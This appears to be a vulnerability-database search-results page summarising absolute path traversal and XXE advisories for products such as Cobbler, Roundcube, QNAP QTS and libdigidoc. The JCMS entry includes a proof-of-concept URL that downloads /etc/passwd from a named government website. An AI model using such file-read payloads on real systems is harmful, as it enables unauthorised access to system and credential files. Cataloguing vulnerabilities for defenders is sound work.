2042 matches found
Path traversal
Absolute path traversal vulnerability in the web interface in Cobbler 2.4.x through 2.6.x allows remote authenticated users to read arbitrary files via the Kickstart field in a profile...
UBUNTU-CVE-2014-3225
Absolute path traversal vulnerability in the web interface in Cobbler 2.4.x through 2.6.x allows remote authenticated users to read arbitrary files via the Kickstart field in a profile...
CVE-2014-2863
CVE-2014-2863 describes multiple absolute path traversal vulnerabilities in PaperThin CommonSpot reported for versions before 7.0.2 and 8.x before 8.0.3. The flaw allows remote attackers to cause an unspecified impact by supplying a full pathname in a parameter. The connected documents corroborat...
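大汉网络 JCMS arbitrary file download
Brief description: An absolute-path file download issue. Details: Code analysis shows that a download function does not restrict permissions or the type of file that can be downloaded; by setting a parameter to an absolute path, the file is downloaded directly. Exploitation: jcms\m19\user\down.jsp?abspathfile=/etc/passwd Proof of vulnerability: Test code: http://www.njgl.gov.cn/jcms/m19/user/down.jsp?abspathfile=/etc/passwd Gulou District government portal website: Downloaded file contents:...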
Path traversal
Absolute path traversal vulnerability in steps/mail/sendmail.inc in Roundcube Webmail before 0.7.3 and 0.8.x before 0.8.6 allows remote attackers to read arbitrary files via a full pathname in the _value parameter for the generic_message_footer setting in a save-perf action to index.php, as exploite...
Path traversal
Absolute path traversal vulnerability in cantata before 1.2.2 allows local users to read arbitrary files via a full pathname in a request to the internal httpd server. NOTE: this vulnerability can be leveraged by remote attackers using CVE-2013-7301...
CVE-2013-7300
Absolute path traversal vulnerability in cantata before 1.2.2 allows local users to read arbitrary files via a full pathname in a request to the internal httpd server. NOTE: this vulnerability can be leveraged by remote attackers using CVE-2013-7301...
CVE-2013-7140
XML External Entity (XXE) vulnerability in the CalDAV interface in Open-Xchange OX AppSuite 7.4.1 and earlier allows remote authenticated users to read portions of arbitrary files via vectors related to the SAX builder and the WebDAV interface. NOTE: this issue has been labeled as both absolute pat...
Path traversal
XML External Entity (XXE) vulnerability in the CalDAV interface in Open-Xchange OX AppSuite 7.4.1 and earlier allows remote authenticated users to read portions of arbitrary files via vectors related to the SAX builder and the WebDAV interface. NOTE: this issue has been labeled as both absolute pat...
CVE-2013-7140
Open-Xchange AppSuite 7.4.1 and earlier is affected by an XML External Entity (XXE) vulnerability in the CalDAV interface (SAX builder and WebDAV). The issue can allow remote authenticated users to read portions of arbitrary files on the server. The root cause is characterized as XXE (and may inc...
CVE-2013-7174
CVE-2013-7174 affects QNAP QTS prior to 4.1.0, via path traversal in the CGI script cgi-bin/jc.cgi. An unauthenticated remote attacker can read arbitrary files by supplying a full pathname in parameter f. The vulnerability is classified with base CVSS v2 score 7.8 (HIGH) under attack vector NET...
PineApp Mail-SeCure Absolute Path Traversal Vulnerability
PineApp Mail-SeCure appliance is prone to an absolute path traversal vulnerability. SPDX-FileCopyrightText: 2013 Greenbone AG. Some text descriptions might be excerpted from referenced sources, and are Copyright (C) by the respective right holders. SPDX-License-Identifier: GPL-2.0-only...
CVE-2013-6827
CVE-2013-6827 affects PineApp Mail-SeCure appliances, with an absolute path traversal in the admin/viewmsg.php endpoint. The vulnerability allows an attacker to read arbitrary files by supplying a full pathname in the msg parameter. The issue is confirmed by multiple feeds in the connected docume...
EC-CUBE information disclosure vulnerability
Overview: EC-CUBE from LOCKON CO.,LTD. is an open source system for creating shopping websites. EC-CUBE contains an information disclosure vulnerability. Gen Sato reported this vulnerability to the developer. JPCERT/CC coordinated with the developer under Information Security Early Warning...
CVE-2012-4104
CVE-2012-4104 affects Cisco UCS Fabric Interconnect’s image-download process, enabling absolute path traversal via a header-defined storage location. The underlying issue allows a local authenticated attacker to overwrite or delete arbitrary files on the filesystem by supplying a crafted image he...
Amazon Linux AMI : php (ALAS-2011-07)
The MITRE CVE database describes these CVEs as: Revert is_a() behavior to php <= 5.3.6 and add a new option (allow_string) for the new behavior (accept string and raise autoload if needed). Use-after-free vulnerability in the substr_replace function in PHP 5.3.6 and earlier allows context-dependent...
CVE-2013-5648
Absolute path traversal vulnerability in the handleStartDataFile function in DigiDocSAXParser.c in libdigidoc 3.6.0.0, as used in ID-software before 3.7.2 and other products, allows remote attackers to overwrite arbitrary files via a filename beginning with / (slash) or \ (backslash) in a DDOC file...
Path traversal
Absolute path traversal vulnerability in the handleStartDataFile function in DigiDocSAXParser.c in libdigidoc 3.6.0.0, as used in ID-software before 3.7.2 and other products, allows remote attackers to overwrite arbitrary files via a filename beginning with / (slash) or \ (backslash) in a DDOC file...
CVE-2013-5648
Affected software: libdigidoc (library) 3.6.0.0 used by ID-software before 3.7.2; component: DigiDocSAXParser.c (handleStartDataFile); vulnerability type: absolute path traversal. Root cause: unvalidated filename beginning with / or \ in a DDOC file allows remote attackers to overwrite arbitrary ...